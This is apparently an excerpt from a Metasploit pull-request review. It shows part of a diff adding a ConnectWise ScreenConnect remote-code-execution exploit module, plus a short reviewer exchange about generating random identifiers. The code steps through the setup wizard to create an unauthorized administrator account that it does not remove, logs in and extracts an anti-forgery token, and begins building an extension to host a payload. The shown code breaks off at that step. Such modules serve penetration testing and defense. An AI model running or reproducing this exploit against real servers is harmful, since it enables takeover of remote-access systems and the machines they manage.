modules/exploits/windows/http/connectwise_screenconnect_rce.rb

```diff
@@ -0,0 +1,298 @@
+    end
+
+    #
+    # 2. Advance to the next step in the setup.
+    #
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 2.')
+    end
+
+    viewstate, viewstategen = get_viewstate(res)
+    unless viewstate && viewstategen
+      fail_with(Failure::UnexpectedReply, 'Did not locate the view state from request 2.')
+    end
+
+    #
+    # 3. Create a new administrator account.
+    #
+    admin_username = Rex::Text.rand_text_alpha_lower(8)
+    admin_password = Rex::Text.rand_text_alphanumeric(16)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$userNameBox' => admin_username,
+        'ctl00$Main$wizard$emailBox' => "#{admin_username}@#{Rex::Text.rand_text_alpha_lower(8)}.#{Rex::Text.rand_text_alpha_lower(3)}",
+        'ctl00$Main$wizard$passwordBox' => admin_password,
+        'ctl00$Main$wizard$verifyPasswordBox' => admin_password,
+        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 3.')
+    end
+
+    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")
+
+    #
+    # 4. Log in with this account to get an authenticated HTTP session.
+    #
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/Administration'),
+      'keep_cookies' => true,
+      'authorization' => basic_auth(admin_username, admin_password)
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 4.')
+    end
+
+    unless res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 4.')
+    end
+
+    anti_forgery_token = Regexp.last_match(1)
+
+    #
+    # 5. Create an extension to host the payload.
+    #
+
+    # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want.
+    plugin_guid = [8, 4, 4, 4, 12].map { |a| Rex::Text.rand_text_hex(a) }.join('-')
+
+    payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"
+
+    payload_handler_class = Rex::Text.rand_text_alpha(8)
```

Comment:
I think this _might_ be fine, but we have a library for generating random vars with rex random identifier

```
generator = Rex::RandomIdentifier::Generator.new({ language: :jsp })
```

Looks like we don't have `csharp` or similar as a language though - you can supply your own language keywords

We can just supply forbidden words if there's anything to fix here:

```
generator = Rex::RandomIdentifier::Generator.new({ forbidden: ['interface', 'class', 'etc' ] })
```

Reply:
I implemented this  via [2839683](https://github.com/rapid7/metasploit-framework/pull/18870/commits/2839683af509726f86e4b13aae38b4978dd98b71) by using `Rex::RandomIdentifier::Generator` and a `forbidden` list as you suggested, thanks!